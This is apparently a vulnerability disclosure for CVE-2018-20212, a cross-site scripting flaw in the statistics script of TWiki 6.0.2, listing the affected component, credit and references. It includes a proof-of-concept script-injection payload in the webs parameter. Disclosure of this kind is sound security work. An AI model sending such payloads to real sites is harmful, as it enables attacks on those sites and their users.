# bin/statistics in TWiki 6.0.2 allows XSS via the webs parameter(CVE-2018-20212)


## Vulnerability Type
Cross Site Scripting (XSS)


## Vendor of Product:
twiki


## Affected Product Version
twiki - 6.0.2


## Affected Component
twiki/bin/statistics


## Attack Type
Remote


## Attack Vectors
/twiki/bin/statistics?webs=<script>alert(1)</script>


## Credit 
This vulnerability was discovered by Jiawang Zhang Coordination Center of China (CNCERT/CC)


## Product Download
http://twiki.org/cgi-bin/view/Codev/DownloadTWiki


## References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20212